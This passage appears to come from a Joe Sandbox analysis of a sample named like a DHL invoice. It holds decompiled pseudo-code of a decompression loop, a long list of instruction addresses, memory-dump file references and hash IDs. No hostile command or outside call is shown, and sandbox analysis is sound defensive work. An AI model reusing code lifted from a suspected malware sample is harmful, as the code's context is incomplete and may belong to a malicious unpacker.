                                        											 *(__ebp - 0x2c) = __eax;
                                        											if(__ebx >= 0xe) {
                                        												L97:
                                        												__ebx = 0;
                                        												 *(__ebp - 0x48) = __ecx;
                                        												L102:
                                        												__eflags =  *(__ebp - 0x48);
                                        												if( *(__ebp - 0x48) <= 0) {
                                        													L107:
                                        													__eax = __eax + __ebx;
                                        													 *(__ebp - 0x40) = 4;
                                        													 *(__ebp - 0x2c) = __eax;
                                        													__eax =  *(__ebp - 4);
                                        													__eax =  *(__ebp - 4) + 0x644;
                                        													__eflags = __eax;
                                        													L108:
                                        													__ebx = 0;
                                        													 *(__ebp - 0x58) = __eax;
                                        													 *(__ebp - 0x50) = 1;
                                        													 *(__ebp - 0x44) = 0;
                                        													 *(__ebp - 0x48) = 0;
                                        													L112:
                                        													__eax =  *(__ebp - 0x40);
                                        													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                        													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                        														L118:
                                        														_t391 = __ebp - 0x2c;
                                        														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                        														__eflags =  *_t391;
                                        														goto L119;
                                        													}
                                        													L113:
                                        													__eax =  *(__ebp - 0x50);
                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                        													__eax =  *(__ebp - 0x58);
                                        													__esi = __edi + __eax;
                                        													 *(__ebp - 0x54) = __esi;
                                        													__ax =  *__esi;
                                        													__ecx = __ax & 0x0000ffff;
                                        													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                        													__eflags =  *(__ebp - 0xc) - __edx;
                                        													if( *(__ebp - 0xc) >= __edx) {
                                        														__ecx = 0;
                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                        														__ecx = 1;
                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                        														__ebx = 1;
                                        														__ecx =  *(__ebp - 0x48);
                                        														__ebx = 1 << __cl;
                                        														__ecx = 1 << __cl;
                                        														__ebx =  *(__ebp - 0x44);
                                        														__ebx =  *(__ebp - 0x44) | __ecx;
                                        														__cx = __ax;
                                        														__cx = __ax >> 5;
                                        														__eax = __eax - __ecx;
                                        														__edi = __edi + 1;
                                        														__eflags = __edi;
                                        														 *(__ebp - 0x44) = __ebx;
                                        														 *__esi = __ax;
                                        														 *(__ebp - 0x50) = __edi;
                                        													} else {
                                        														 *(__ebp - 0x10) = __edx;
                                        														0x800 = 0x800 - __ecx;
                                        														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                        														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                        														 *__esi = __dx;
                                        													}
                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                        														L111:
                                        														_t368 = __ebp - 0x48;
                                        														 *_t368 =  *(__ebp - 0x48) + 1;
                                        														__eflags =  *_t368;
                                        														goto L112;
                                        													} else {
                                        														L117:
                                        														goto L109;
                                        													}
                                        												}
                                        												L103:
                                        												__ecx =  *(__ebp - 0xc);
                                        												__ebx = __ebx + __ebx;
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                        												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                        												 *(__ebp - 0x44) = __ebx;
                                        												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                        													__ecx =  *(__ebp - 0x10);
                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                        													__ebx = __ebx | 0x00000001;
                                        													__eflags = __ebx;
                                        													 *(__ebp - 0x44) = __ebx;
                                        												}
                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                        													L101:
                                        													_t338 = __ebp - 0x48;
                                        													 *_t338 =  *(__ebp - 0x48) - 1;
                                        													__eflags =  *_t338;
                                        													goto L102;
                                        												} else {
                                        													L106:
                                        													goto L99;
                                        												}
                                        											}
                                        											L96:
                                        											__edx =  *(__ebp - 4);
                                        											__eax = __eax - __ebx;
                                        											 *(__ebp - 0x40) = __ecx;
                                        											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                        											goto L108;
                                        										case 0x1a:
                                        											L56:
                                        											__eflags =  *(__ebp - 0x64);
                                        											if( *(__ebp - 0x64) == 0) {
                                        												L162:
                                        												 *(__ebp - 0x88) = 0x1a;
                                        												goto L170;
                                        											}
                                        											L57:
                                        											__ecx =  *(__ebp - 0x68);
                                        											__al =  *(__ebp - 0x5c);
                                        											__edx =  *(__ebp - 8);
                                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                        											 *( *(__ebp - 0x68)) = __al;
                                        											__ecx =  *(__ebp - 0x14);
                                        											 *(__ecx +  *(__ebp - 8)) = __al;
                                        											__eax = __ecx + 1;
                                        											__edx = 0;
                                        											_t192 = __eax %  *(__ebp - 0x74);
                                        											__eax = __eax /  *(__ebp - 0x74);
                                        											__edx = _t192;
                                        											goto L80;
                                        										case 0x1b:
                                        											L76:
                                        											__eflags =  *(__ebp - 0x64);
                                        											if( *(__ebp - 0x64) == 0) {
                                        												L163:
                                        												 *(__ebp - 0x88) = 0x1b;
                                        												goto L170;
                                        											}
                                        											L77:
                                        											__eax =  *(__ebp - 0x14);
                                        											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        											__eflags = __eax -  *(__ebp - 0x74);
                                        											if(__eax >=  *(__ebp - 0x74)) {
                                        												__eax = __eax +  *(__ebp - 0x74);
                                        												__eflags = __eax;
                                        											}
                                        											__edx =  *(__ebp - 8);
                                        											__cl =  *(__eax + __edx);
                                        											__eax =  *(__ebp - 0x14);
                                        											 *(__ebp - 0x5c) = __cl;
                                        											 *(__eax + __edx) = __cl;
                                        											__eax = __eax + 1;
                                        											__edx = 0;
                                        											_t275 = __eax %  *(__ebp - 0x74);
                                        											__eax = __eax /  *(__ebp - 0x74);
                                        											__edx = _t275;
                                        											__eax =  *(__ebp - 0x68);
                                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        											_t284 = __ebp - 0x64;
                                        											 *_t284 =  *(__ebp - 0x64) - 1;
                                        											__eflags =  *_t284;
                                        											 *( *(__ebp - 0x68)) = __cl;
                                        											L80:
                                        											 *(__ebp - 0x14) = __edx;
                                        											goto L81;
                                        										case 0x1c:
                                        											while(1) {
                                        												L123:
                                        												__eflags =  *(__ebp - 0x64);
                                        												if( *(__ebp - 0x64) == 0) {
                                        													break;
                                        												}
                                        												L124:
                                        												__eax =  *(__ebp - 0x14);
                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        												__eflags = __eax -  *(__ebp - 0x74);
                                        												if(__eax >=  *(__ebp - 0x74)) {
                                        													__eax = __eax +  *(__ebp - 0x74);
                                        													__eflags = __eax;
                                        												}
                                        												__edx =  *(__ebp - 8);
                                        												__cl =  *(__eax + __edx);
                                        												__eax =  *(__ebp - 0x14);
                                        												 *(__ebp - 0x5c) = __cl;
                                        												 *(__eax + __edx) = __cl;
                                        												__eax = __eax + 1;
                                        												__edx = 0;
                                        												_t414 = __eax %  *(__ebp - 0x74);
                                        												__eax = __eax /  *(__ebp - 0x74);
                                        												__edx = _t414;
                                        												__eax =  *(__ebp - 0x68);
                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                        												__eflags =  *(__ebp - 0x30);
                                        												 *( *(__ebp - 0x68)) = __cl;
                                        												 *(__ebp - 0x14) = _t414;
                                        												if( *(__ebp - 0x30) > 0) {
                                        													continue;
                                        												} else {
                                        													L127:
                                        													L81:
                                        													 *(__ebp - 0x88) = 2;
                                        													goto L1;
                                        												}
                                        											}
                                        											L167:
                                        											 *(__ebp - 0x88) = 0x1c;
                                        											goto L170;
                                        									}
                                        								}
                                        								L171:
                                        								_t539 = _t538 | 0xffffffff;
                                        								goto L172;
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}















                                        0x00406a9b
                                        0x00406a9b
                                        0x00406a9b
                                        0x00406a9b
                                        0x00406aa1
                                        0x00406aa5
                                        0x00406aa9
                                        0x00406ab3
                                        0x00406ac1
                                        0x00406d97
                                        0x00406d97
                                        0x00406d9a
                                        0x00406da1
                                        0x00406dce
                                        0x00406dce
                                        0x00406dd2
                                        0x00000000
                                        0x00000000
                                        0x00406dd4
                                        0x00406ddd
                                        0x00406de3
                                        0x00406de6
                                        0x00406de9
                                        0x00406dec
                                        0x00406def
                                        0x00406df5
                                        0x00406e0e
                                        0x00406e11
                                        0x00406e1d
                                        0x00406e1e
                                        0x00406e21
                                        0x00406df7
                                        0x00406df7
                                        0x00406e06
                                        0x00406e09
                                        0x00406e09
                                        0x00406e2b
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dce
                                        0x00406dd2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406e2d
                                        0x00406e2d
                                        0x00406da6
                                        0x00406daa
                                        0x00406ee2
                                        0x00406ee2
                                        0x00406eec
                                        0x00406ef4
                                        0x00406efb
                                        0x00406efd
                                        0x00406f04
                                        0x00406f08
                                        0x00406f08
                                        0x00406db0
                                        0x00406db6
                                        0x00406dbd
                                        0x00406dc5
                                        0x00406dc5
                                        0x00406dc8
                                        0x00000000
                                        0x00406dc8
                                        0x00406e32
                                        0x00406e3f
                                        0x00406e42
                                        0x00406d4e
                                        0x00406d4e
                                        0x00406d4e
                                        0x004064ea
                                        0x004064ea
                                        0x004064ea
                                        0x004064f3
                                        0x00000000
                                        0x00000000
                                        0x004064f9
                                        0x004064f9
                                        0x00000000
                                        0x00406500
                                        0x00406504
                                        0x00000000
                                        0x00000000
                                        0x0040650a
                                        0x0040650d
                                        0x00406510
                                        0x00406513
                                        0x00406517
                                        0x00000000
                                        0x00000000
                                        0x0040651d
                                        0x0040651d
                                        0x00406520
                                        0x00406522
                                        0x00406523
                                        0x00406526
                                        0x00406528
                                        0x00406529
                                        0x0040652b
                                        0x0040652e
                                        0x00406533
                                        0x00406538
                                        0x00406541
                                        0x00406554
                                        0x00406557
                                        0x00406563
                                        0x0040658b
                                        0x0040658d
                                        0x0040659b
                                        0x0040659b
                                        0x0040659f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040658f
                                        0x0040658f
                                        0x00406592
                                        0x00406593
                                        0x00406593
                                        0x00000000
                                        0x0040658f
                                        0x00406565
                                        0x00406569
                                        0x0040656e
                                        0x0040656e
                                        0x00406577
                                        0x0040657f
                                        0x00406582
                                        0x00000000
                                        0x00406588
                                        0x00406588
                                        0x00000000
                                        0x00406588
                                        0x00000000
                                        0x004065a5
                                        0x004065a5
                                        0x004065a9
                                        0x00406e55
                                        0x00406e55
                                        0x00000000
                                        0x00406e55
                                        0x004065af
                                        0x004065b2
                                        0x004065c2
                                        0x004065c5
                                        0x004065c8
                                        0x004065c8
                                        0x004065c8
                                        0x004065cb
                                        0x004065cf
                                        0x00000000
                                        0x00000000
                                        0x004065d1
                                        0x004065d1
                                        0x004065d7
                                        0x00406601
                                        0x00406607
                                        0x0040660e
                                        0x00000000
                                        0x0040660e
                                        0x004065d9
                                        0x004065dd
                                        0x004065e0
                                        0x004065e5
                                        0x004065e5
                                        0x004065f0
                                        0x004065f8
                                        0x004065fb
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406640
                                        0x00406646
                                        0x00406649
                                        0x00406656
                                        0x0040665e
                                        0x00000000
                                        0x00000000
                                        0x00406615
                                        0x00406615
                                        0x00406619
                                        0x00406e64
                                        0x00406e64
                                        0x00000000
                                        0x00406e64
                                        0x0040661f
                                        0x00406625
                                        0x00406630
                                        0x00406630
                                        0x00406630
                                        0x00406633
                                        0x00406636
                                        0x00406639
                                        0x0040663e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406cd5
                                        0x00406cd5
                                        0x00406cdb
                                        0x00406ce1
                                        0x00406ce7
                                        0x00406d01
                                        0x00406d04
                                        0x00406d0a
                                        0x00406d15
                                        0x00406d15
                                        0x00406d17
                                        0x00406ce9
                                        0x00406ce9
                                        0x00406cf8
                                        0x00406cfc
                                        0x00406cfc
                                        0x00406d21
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406d23
                                        0x00406d27
                                        0x00406ed6
                                        0x00406ed6
                                        0x00000000
                                        0x00406ed6
                                        0x00406d2d
                                        0x00406d33
                                        0x00406d3a
                                        0x00406d42
                                        0x00406d45
                                        0x00406d48
                                        0x00406d48
                                        0x00406d4e
                                        0x00406d4e
                                        0x00000000
                                        0x00000000
                                        0x00406666
                                        0x00406666
                                        0x00406668
                                        0x0040666b
                                        0x004066dc
                                        0x004066dc
                                        0x004066df
                                        0x004066e2
                                        0x004066e9
                                        0x004066f3
                                        0x00000000
                                        0x004066f3
                                        0x0040666d
                                        0x0040666d
                                        0x00406671
                                        0x00406674
                                        0x00406676
                                        0x00406679
                                        0x0040667c
                                        0x0040667e
                                        0x00406681
                                        0x00406683
                                        0x00406688
                                        0x0040668b
                                        0x0040668e
                                        0x00406692
                                        0x00406699
                                        0x0040669c
                                        0x004066a3
                                        0x004066a7
                                        0x004066af
                                        0x004066af
                                        0x004066af
                                        0x004066a9
                                        0x004066a9
                                        0x004066a9
                                        0x0040669e
                                        0x0040669e
                                        0x0040669e
                                        0x004066b3
                                        0x004066b6
                                        0x004066d4
                                        0x004066d4
                                        0x004066d6
                                        0x00000000
                                        0x004066b8
                                        0x004066b8
                                        0x004066b8
                                        0x004066bb
                                        0x004066be
                                        0x004066c1
                                        0x004066c3
                                        0x004066c3
                                        0x004066c3
                                        0x004066c6
                                        0x004066c9
                                        0x004066cb
                                        0x004066cc
                                        0x004066cf
                                        0x00000000
                                        0x004066cf
                                        0x00000000
                                        0x00406905
                                        0x00406905
                                        0x00406909
                                        0x00406927
                                        0x00406927
                                        0x0040692a
                                        0x00406931
                                        0x00406934
                                        0x00406937
                                        0x0040693a
                                        0x0040693d
                                        0x00406940
                                        0x00406942
                                        0x00406949
                                        0x0040694a
                                        0x0040694c
                                        0x0040694f
                                        0x00406952
                                        0x00406955
                                        0x00406955
                                        0x0040695a
                                        0x00000000
                                        0x0040695a
                                        0x0040690b
                                        0x0040690b
                                        0x0040690e
                                        0x00406911
                                        0x0040691b
                                        0x00000000
                                        0x00000000
                                        0x0040696f
                                        0x0040696f
                                        0x00406973
                                        0x00406996
                                        0x00406999
                                        0x0040699c
                                        0x004069a6
                                        0x00406975
                                        0x00406975
                                        0x00406978
                                        0x0040697b
                                        0x0040697e
                                        0x0040698b
                                        0x0040698e
                                        0x0040698e
                                        0x00000000
                                        0x00000000
                                        0x004069b2
                                        0x004069b2
                                        0x004069b6
                                        0x00000000
                                        0x00000000
                                        0x004069bc
                                        0x004069bc
                                        0x004069c0
                                        0x00000000
                                        0x00000000
                                        0x004069c6
                                        0x004069c6
                                        0x004069c8
                                        0x004069cc
                                        0x004069cc
                                        0x004069cf
                                        0x004069d3
                                        0x00000000
                                        0x00000000
                                        0x00406a23
                                        0x00406a23
                                        0x00406a27
                                        0x00406a2e
                                        0x00406a2e
                                        0x00406a31
                                        0x00406a34
                                        0x00406a3e
                                        0x00000000
                                        0x00406a3e
                                        0x00406a29
                                        0x00406a29
                                        0x00000000
                                        0x00000000
                                        0x00406a4a
                                        0x00406a4a
                                        0x00406a4e
                                        0x00406a55
                                        0x00406a58
                                        0x00406a5b
                                        0x00406a50
                                        0x00406a50
                                        0x00406a50
                                        0x00406a5e
                                        0x00406a61
                                        0x00406a64
                                        0x00406a64
                                        0x00406a67
                                        0x00406a6a
                                        0x00406a6d
                                        0x00406a6d
                                        0x00406a70
                                        0x00406a77
                                        0x00406a7c
                                        0x00000000
                                        0x00000000
                                        0x00406b0a
                                        0x00406b0a
                                        0x00406b0e
                                        0x00406eac
                                        0x00406eac
                                        0x00000000
                                        0x00406eac
                                        0x00406b14
                                        0x00406b14
                                        0x00406b17
                                        0x00406b1a
                                        0x00406b1e
                                        0x00406b21
                                        0x00406b27
                                        0x00406b29
                                        0x00406b29
                                        0x00406b29
                                        0x00406b2c
                                        0x00406b2f
                                        0x00000000
                                        0x00000000
                                        0x004066ff
                                        0x004066ff
                                        0x00406703
                                        0x00406e70
                                        0x00406e70
                                        0x00000000
                                        0x00406e70
                                        0x00406709
                                        0x00406709
                                        0x0040670c
                                        0x0040670f
                                        0x00406713
                                        0x00406716
                                        0x0040671c
                                        0x0040671e
                                        0x0040671e
                                        0x0040671e
                                        0x00406721
                                        0x00406724
                                        0x00406724
                                        0x00406727
                                        0x0040672a
                                        0x00000000
                                        0x00000000
                                        0x00406730
                                        0x00406730
                                        0x00406736
                                        0x00000000
                                        0x00000000
                                        0x0040673c
                                        0x0040673c
                                        0x00406740
                                        0x00406743
                                        0x00406746
                                        0x00406749
                                        0x0040674c
                                        0x0040674d
                                        0x00406750
                                        0x00406752
                                        0x00406758
                                        0x0040675b
                                        0x0040675e
                                        0x00406761
                                        0x00406764
                                        0x00406767
                                        0x0040676a
                                        0x00406786
                                        0x00406789
                                        0x0040678c
                                        0x0040678f
                                        0x00406796
                                        0x0040679a
                                        0x0040679c
                                        0x004067a0
                                        0x0040676c
                                        0x0040676c
                                        0x00406770
                                        0x00406778
                                        0x0040677d
                                        0x0040677f
                                        0x00406781
                                        0x00406781
                                        0x004067a3
                                        0x004067aa
                                        0x004067ad
                                        0x00000000
                                        0x004067b3
                                        0x004067b3
                                        0x00000000
                                        0x004067b3
                                        0x00000000
                                        0x004067b8
                                        0x004067b8
                                        0x004067bc
                                        0x00406e7c
                                        0x00406e7c
                                        0x00000000
                                        0x00406e7c
                                        0x004067c2
                                        0x004067c2
                                        0x004067c5
                                        0x004067c8
                                        0x004067cc
                                        0x004067cf
                                        0x004067d5
                                        0x004067d7
                                        0x004067d7
                                        0x004067d7
                                        0x004067da
                                        0x004067dd
                                        0x004067dd
                                        0x004067dd
                                        0x004067e3
                                        0x00000000
                                        0x00000000
                                        0x004067e5
                                        0x004067e5
                                        0x004067e8
                                        0x004067eb
                                        0x004067ee
                                        0x004067f1
                                        0x004067f4
                                        0x004067f7
                                        0x004067fa
                                        0x004067fd
                                        0x00406800
                                        0x00406803
                                        0x0040681b
                                        0x0040681e
                                        0x00406821
                                        0x00406824
                                        0x00406824
                                        0x00406827
                                        0x0040682b
                                        0x0040682d
                                        0x00406805
                                        0x00406805
                                        0x0040680d
                                        0x00406812
                                        0x00406814
                                        0x00406816
                                        0x00406816
                                        0x00406830
                                        0x00406837
                                        0x0040683a
                                        0x00000000
                                        0x0040683c
                                        0x0040683c
                                        0x00000000
                                        0x0040683c
                                        0x0040683a
                                        0x00406841
                                        0x00406841
                                        0x00406841
                                        0x00406841
                                        0x00000000
                                        0x00000000
                                        0x0040687c
                                        0x0040687c
                                        0x00406880
                                        0x00406e88
                                        0x00406e88
                                        0x00000000
                                        0x00406e88
                                        0x00406886
                                        0x00406886
                                        0x00406889
                                        0x0040688c
                                        0x00406890
                                        0x00406893
                                        0x00406899
                                        0x0040689b
                                        0x0040689b
                                        0x0040689b
                                        0x0040689e
                                        0x004068a1
                                        0x004068a1
                                        0x004068a7
                                        0x00406845
                                        0x00406845
                                        0x00406848
                                        0x00000000
                                        0x00406848
                                        0x004068a9
                                        0x004068a9
                                        0x004068ac
                                        0x004068af
                                        0x004068b2
                                        0x004068b5
                                        0x004068b8
                                        0x004068bb
                                        0x004068be
                                        0x004068c1
                                        0x004068c4
                                        0x004068c7
                                        0x004068df
                                        0x004068e2
                                        0x004068e5
                                        0x004068e8
                                        0x004068e8
                                        0x004068eb
                                        0x004068ef
                                        0x004068f1
                                        0x004068c9
                                        0x004068c9
                                        0x004068d1
                                        0x004068d6
                                        0x004068d8
                                        0x004068da
                                        0x004068da
                                        0x004068f4
                                        0x004068fb
                                        0x004068fe
                                        0x00000000
                                        0x00406900
                                        0x00406900
                                        0x00000000
                                        0x00406900
                                        0x00000000
                                        0x00406b8d
                                        0x00406b8d
                                        0x00406b91
                                        0x00406eb8
                                        0x00406eb8
                                        0x00000000
                                        0x00406eb8
                                        0x00406b97
                                        0x00406b97
                                        0x00406b9a
                                        0x00406b9d
                                        0x00406ba1
                                        0x00406ba4
                                        0x00406baa
                                        0x00406bac
                                        0x00406bac
                                        0x00406bac
                                        0x00406baf
                                        0x00000000
                                        0x00000000
                                        0x0040695d
                                        0x0040695d
                                        0x00406960
                                        0x00000000
                                        0x00000000
                                        0x00406c9c
                                        0x00406c9c
                                        0x00406ca0
                                        0x00406cc2
                                        0x00406cc2
                                        0x00406cc5
                                        0x00406ccf
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x00406ca2
                                        0x00406ca2
                                        0x00406ca5
                                        0x00406ca9
                                        0x00406cac
                                        0x00406cac
                                        0x00406caf
                                        0x00000000
                                        0x00000000
                                        0x00406d59
                                        0x00406d59
                                        0x00406d5d
                                        0x00406d7b
                                        0x00406d7b
                                        0x00406d7b
                                        0x00406d7b
                                        0x00406d82
                                        0x00406d89
                                        0x00406d90
                                        0x00406d90
                                        0x00406d97
                                        0x00406d9a
                                        0x00406da1
                                        0x00000000
                                        0x00406da4
                                        0x00406d5f
                                        0x00406d5f
                                        0x00406d62
                                        0x00406d65
                                        0x00406d68
                                        0x00406d6f
                                        0x00406cb3
                                        0x00406cb3
                                        0x00406cb6
                                        0x00000000
                                        0x00000000
                                        0x00406e4a
                                        0x00406e4a
                                        0x00406e4d
                                        0x00406d4e
                                        0x00406d4e
                                        0x00406d4e
                                        0x00000000
                                        0x00406d54
                                        0x00000000
                                        0x00406a84
                                        0x00406a84
                                        0x00406a86
                                        0x00406a8d
                                        0x00406a8e
                                        0x00406a90
                                        0x00406a93
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406d97
                                        0x00406d97
                                        0x00406d9a
                                        0x00406da1
                                        0x00000000
                                        0x00406da4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406ac9
                                        0x00406ac9
                                        0x00406acc
                                        0x00406b02
                                        0x00406b02
                                        0x00406c32
                                        0x00406c32
                                        0x00406c32
                                        0x00406c32
                                        0x00406c35
                                        0x00406c35
                                        0x00406c38
                                        0x00406c3a
                                        0x00406ec4
                                        0x00406ec4
                                        0x00000000
                                        0x00406ec4
                                        0x00406c40
                                        0x00406c40
                                        0x00406c43
                                        0x00000000
                                        0x00000000
                                        0x00406c49
                                        0x00406c49
                                        0x00406c4d
                                        0x00406c50
                                        0x00406c50
                                        0x00406c50
                                        0x00000000
                                        0x00406c50
                                        0x00406ace
                                        0x00406ace
                                        0x00406ad0
                                        0x00406ad2
                                        0x00406ad4
                                        0x00406ad7
                                        0x00406ad8
                                        0x00406ada
                                        0x00406adc
                                        0x00406adf
                                        0x00406ae2
                                        0x00406af8
                                        0x00406af8
                                        0x00406afd
                                        0x00406b35
                                        0x00406b35
                                        0x00406b39
                                        0x00406b62
                                        0x00406b65
                                        0x00406b67
                                        0x00406b6e
                                        0x00406b71
                                        0x00406b74
                                        0x00406b74
                                        0x00406b79
                                        0x00406b79
                                        0x00406b7b
                                        0x00406b7e
                                        0x00406b85
                                        0x00406b88
                                        0x00406bb5
                                        0x00406bb5
                                        0x00406bb8
                                        0x00406bbb
                                        0x00406c2f
                                        0x00406c2f
                                        0x00406c2f
                                        0x00406c2f
                                        0x00000000
                                        0x00406c2f
                                        0x00406bbd
                                        0x00406bbd
                                        0x00406bc3
                                        0x00406bc6
                                        0x00406bc9
                                        0x00406bcc
                                        0x00406bcf
                                        0x00406bd2
                                        0x00406bd5
                                        0x00406bd8
                                        0x00406bdb
                                        0x00406bde
                                        0x00406bf7
                                        0x00406bf9
                                        0x00406bfc
                                        0x00406bfd
                                        0x00406c00
                                        0x00406c02
                                        0x00406c05
                                        0x00406c07
                                        0x00406c09
                                        0x00406c0c
                                        0x00406c0e
                                        0x00406c11
                                        0x00406c15
                                        0x00406c17
                                        0x00406c17
                                        0x00406c18
                                        0x00406c1b
                                        0x00406c1e
                                        0x00406be0
                                        0x00406be0
                                        0x00406be8
                                        0x00406bed
                                        0x00406bef
                                        0x00406bf2
                                        0x00406bf2
                                        0x00406c21
                                        0x00406c28
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00000000
                                        0x00406c2a
                                        0x00406c2a
                                        0x00000000
                                        0x00406c2a
                                        0x00406c28
                                        0x00406b3b
                                        0x00406b3b
                                        0x00406b3e
                                        0x00406b40
                                        0x00406b43
                                        0x00406b46
                                        0x00406b49
                                        0x00406b4b
                                        0x00406b4e
                                        0x00406b51
                                        0x00406b51
                                        0x00406b54
                                        0x00406b54
                                        0x00406b57
                                        0x00406b5e
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00000000
                                        0x00406b60
                                        0x00406b60
                                        0x00000000
                                        0x00406b60
                                        0x00406b5e
                                        0x00406ae4
                                        0x00406ae4
                                        0x00406ae7
                                        0x00406ae9
                                        0x00406aec
                                        0x00000000
                                        0x00000000
                                        0x0040684b
                                        0x0040684b
                                        0x0040684f
                                        0x00406e94
                                        0x00406e94
                                        0x00000000
                                        0x00406e94
                                        0x00406855
                                        0x00406855
                                        0x00406858
                                        0x0040685b
                                        0x0040685e
                                        0x00406861
                                        0x00406864
                                        0x00406867
                                        0x00406869
                                        0x0040686c
                                        0x0040686f
                                        0x00406872
                                        0x00406874
                                        0x00406874
                                        0x00406874
                                        0x00000000
                                        0x00000000
                                        0x004069d6
                                        0x004069d6
                                        0x004069da
                                        0x00406ea0
                                        0x00406ea0
                                        0x00000000
                                        0x00406ea0
                                        0x004069e0
                                        0x004069e0
                                        0x004069e3
                                        0x004069e6
                                        0x004069e9
                                        0x004069eb
                                        0x004069eb
                                        0x004069eb
                                        0x004069ee
                                        0x004069f1
                                        0x004069f4
                                        0x004069f7
                                        0x004069fa
                                        0x004069fd
                                        0x004069fe
                                        0x00406a00
                                        0x00406a00
                                        0x00406a00
                                        0x00406a03
                                        0x00406a06
                                        0x00406a09
                                        0x00406a0c
                                        0x00406a0c
                                        0x00406a0c
                                        0x00406a0f
                                        0x00406a11
                                        0x00406a11
                                        0x00000000
                                        0x00000000
                                        0x00406c53
                                        0x00406c53
                                        0x00406c53
                                        0x00406c57
                                        0x00000000
                                        0x00000000
                                        0x00406c5d
                                        0x00406c5d
                                        0x00406c60
                                        0x00406c63
                                        0x00406c66
                                        0x00406c68
                                        0x00406c68
                                        0x00406c68
                                        0x00406c6b
                                        0x00406c6e
                                        0x00406c71
                                        0x00406c74
                                        0x00406c77
                                        0x00406c7a
                                        0x00406c7b
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c80
                                        0x00406c83
                                        0x00406c86
                                        0x00406c89
                                        0x00406c8c
                                        0x00406c90
                                        0x00406c92
                                        0x00406c95
                                        0x00000000
                                        0x00406c97
                                        0x00406c97
                                        0x00406a14
                                        0x00406a14
                                        0x00000000
                                        0x00406a14
                                        0x00406c95
                                        0x00406eca
                                        0x00406eca
                                        0x00000000
                                        0x00000000
                                        0x004064f9
                                        0x00406f01
                                        0x00406f01
                                        0x00000000
                                        0x00406f01
                                        0x00406d4e
                                        0x00406dce
                                        0x00406d97

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 03e86151e03bba78afe16222fe9d5ebe1cb7bbef763218a955a86232309b7881
                                        • Instruction ID: 81ce818a04e0c3cc04ce684d9a2a9ddfd009c22adec174195ca66df60ea86fc9
                                        • Opcode Fuzzy Hash: 03e86151e03bba78afe16222fe9d5ebe1cb7bbef763218a955a86232309b7881
